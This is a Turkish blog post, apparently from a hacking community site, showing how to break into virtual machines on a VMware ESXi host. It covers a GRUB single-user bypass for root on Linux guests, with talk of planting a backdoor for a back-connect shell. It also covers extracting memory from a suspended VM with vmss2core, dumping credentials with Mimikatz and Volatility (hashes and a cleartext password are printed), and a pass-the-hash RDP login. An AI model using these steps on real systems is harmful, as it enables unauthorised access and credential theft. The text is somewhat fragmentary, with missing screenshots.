Yazar: Ahmet Çelik(t4cs1zkr4L)
Vmware ESXI Virtual Machine Hacking (Linux,Windows) (Pass to Hash, Mimikatz, Windbg, Volatility )
Merhaba arkadaşlar, uzun süredir hem diaryofinjector hem vvhack için bir döküman yazma düşüncem vardı. Hazır 3 gün tatil bolca zamanımız varken bu dökümanı hazırlayalım dedik. Döküman başlıktan anlaşılacağı üzere Vmware üzerinde ki işletim sistemlerine ne tür saldırılar yapılabilir. Hem linux hem windows sistemlerini işleyeceğiz burada. Konu kendi içerisinde farklı konulara evrilecek. Pass to Hash, Windbg, Mimikatz, Volatility gibi teknik konuları ve araçları inceleyeceğiz. Döküman Vmware ESXI 6.5 üzerinde Pardus ve Windows Server 2008 R2 işletim sistemleri üzerinde denenmiştir. Pardus’a ve dostlara selam olsun. Artık başlayalım.
Bir sistemi hacklemeye çalışıyorken, hele ki büyük bir sistem mevzu bahis ise Vmware yüksek ihtimal karşılaşabileceğiniz bir sanallaştırma ürünüdür. Sistemde daha öne yakaladığınız bir şifre veya Active Directory üzerinden aldığınız bir user/pass Wmware erişimi olduğunu gördünüz. Bu noktadan sonra neler yapabiliriz. Çünkü sanal makinelere girmeye çalıştığımızda karşımıza şöyle bir ekran çıkacak.
Öncelikle işletim sistemimiz Linux ise çoğu kişinin bildiği açılışta GRUB menüsünden “e” tuşuna basarak sonrasında ro yazısını rw init=/bin/bash sonrasında Ctrl-X tuşu ile direk komut satırına düşebiliyoruz. Tabi bu dakikadan sonra ister user ekler ister şifre değiştirir ister backdoor atıp backconnect alıp Vmware’dan çıkarsınız size kalmış.
"vmss2core.exe -W virtual_machine_name.vmss virtual_machine_name.vmem"
* Username : Administrator * Domain : WIN-PLFLLV1KER8 * LM : 13ef99d22b622297ccf9155e3e7db453 * NTLM : 0eb4dabbd2a9141866f2ebb055ae172c * SHA1 : 8bcbea19a1bfb18ed322d68f44d758e644e638ca tspkg : * Username : Administrator * Domain : WIN-PLFLLV1KER8 * Password : vvhack!123
Unutmadan burada bir parantez açmak istiyorum (eğer makine https://support.microsoft.com/en-us/help/2984981/rdc-8-1-update-for-restricted-administration-in-windows-7-or-windows-s bu güncellemeyi almışsa rdp işini unutun)mimikatz # sekurlsa::pth /user:“Administrator” /domain:“WIN-PLFLLV1KER8” /ntlm:0
eb4dabbd2a9141866f2ebb055ae172c /run:"mstsc.exe /restrictedadmin"
pardus@pardus:/tmp/volatility-master$ python vol.py imageinfo -f …/memory.dmp
Suggested Profile(s) : No suggestion (Instantiated with Win10x64_15063)
AS Layer1 : SkipDuplicatesAMD64PagedMemory (Kernel AS)
AS Layer2 : WindowsCrashDumpSpace64 (Unnamed AS)
AS Layer3 : FileAddressSpace (/tmp/memory.dmp)
PAE type : No PAE
DTB : 0x187000L
KUSER_SHARED_DATA : 0xfffff78000000000L
Image date and time : 2020-05-02 00:55:51 UTC+0000
Image local date and time : 2020-05-02 03:55:51 +0300
Görüldüğü üzere buralarda sapmalar olabiliyor. Bizim işletim sistemimiz Windows Server 2008 olmasına rağmen imageinfo’da Windows10 diyebiliyor. İşletim sistemini biliyorsanız iş daha kolay. Bu parametre bize profile için gerekli. Programın sağladığı profiller:
python vol.py --info
VistaSP0x64 - A Profile for Windows Vista SP0 x64
VistaSP0x86 - A Profile for Windows Vista SP0 x86
VistaSP1x64 - A Profile for Windows Vista SP1 x64
VistaSP1x86 - A Profile for Windows Vista SP1 x86
VistaSP2x64 - A Profile for Windows Vista SP2 x64
VistaSP2x86 - A Profile for Windows Vista SP2 x86
Win10x64 - A Profile for Windows 10 x64
Win10x86 - A Profile for Windows 10 x86
Win2003SP0x86 - A Profile for Windows 2003 SP0 x86
Win2003SP1x64 - A Profile for Windows 2003 SP1 x64
Win2003SP1x86 - A Profile for Windows 2003 SP1 x86
Win2003SP2x64 - A Profile for Windows 2003 SP2 x64
Win2003SP2x86 - A Profile for Windows 2003 SP2 x86
Win2008R2SP0x64 - A Profile for Windows 2008 R2 SP0 x64
Win2008R2SP1x64 - A Profile for Windows 2008 R2 SP1 x64
Win2008SP1x64 - A Profile for Windows 2008 SP1 x64
Win2008SP1x86 - A Profile for Windows 2008 SP1 x86
Win2008SP2x64 - A Profile for Windows 2008 SP2 x64
Win2008SP2x86 - A Profile for Windows 2008 SP2 x86
Win2012R2x64 - A Profile for Windows Server 2012 R2 x64
Win2012x64 - A Profile for Windows Server 2012 x64
Win7SP0x64 - A Profile for Windows 7 SP0 x64
Win7SP0x86 - A Profile for Windows 7 SP0 x86
Win7SP1x64 - A Profile for Windows 7 SP1 x64
Win7SP1x86 - A Profile for Windows 7 SP1 x86
Win81U1x64 - A Profile for Windows 8.1 Update 1 x64
Win81U1x86 - A Profile for Windows 8.1 Update 1 x86
Win8SP0x64 - A Profile for Windows 8 x64
Win8SP0x86 - A Profile for Windows 8 x86
Win8SP1x64 - A Profile for Windows 8.1 x64
Win8SP1x86 - A Profile for Windows 8.1 x86
WinXPSP1x64 - A Profile for Windows XP SP1 x64
WinXPSP2x64 - A Profile for Windows XP SP2 x64
WinXPSP2x86 - A Profile for Windows XP SP2 x86
WinXPSP3x86 - A Profile for Windows XP SP3 x86
pardus@pardus:/tmp/volatility-master$ python vol.py hivelist -f …/memory.dmp --profile=Win2008R2SP1x64
Volatility Foundation Volatility Framework 2.6.1
Virtual Physical Name
0xfffff8a00627a010 0x0000000133a67010 ??\C:\System Volume Information\Syscache.hve
0xfffff8a006d88010 0x00000001252de010 ??\C:\Users\Administrator\AppData\Local\Microsoft\Windows\UsrClass.dat
0xfffff8a006d92010 0x000000012550d010 ??\C:\Users\Administrator\ntuser.dat
0xfffff8a00000e010 0x0000000136f9d010 [no name]
0xfffff8a0000232d0 0x0000000136fa82d0 \REGISTRY\MACHINE\SYSTEM
0xfffff8a000057010 0x000000013705e010 \REGISTRY\MACHINE\HARDWARE
0xfffff8a000f44010 0x0000000106380010 \Device\HarddiskVolume1\Boot\BCD
0xfffff8a00172c010 0x000000011485b010 \SystemRoot\System32\Config\SOFTWARE
0xfffff8a00542c010 0x0000000103d07010 \SystemRoot\System32\Config\SECURITY
0xfffff8a005496010 0x000000010468f010 \SystemRoot\System32\Config\SAM
0xfffff8a0054cc010 0x00000001034cc010 ??\C:\Windows\ServiceProfiles\LocalService\NTUSER.DAT
0xfffff8a005534010 0x00000001028b0010 ??\C:\Windows\ServiceProfiles\NetworkService\NTUSER.DAT
0xfffff8a005e77010 0x00000001145fd010 \SystemRoot\System32\Config\DEFAULT
pardus@pardus:/tmp/volatility-master$ python vol.py hashdump -f …/memory.dmp --profile=Win2008R2SP1x64
Volatility Foundation Volatility Framework 2.6.1
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0eb4dabbd2a9141866f2ebb055ae172c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
privilege::debug
log a.log
sekurlsa::logonpasswords /all
1 yorum so far
"user/pass Wmware erişimi olduğunu gördünüz" zaten işin büyük kısmını görmüşüz kalanı içinde fazla zor olmaz hiçbir zaman üstadım.. Sizden xss makaleleri bekliyoruz sadece cookie gelince mi sistemlere giriş yapacağız, yok mudur bu xss'in başka yolları !?!
EmojilerEmojiler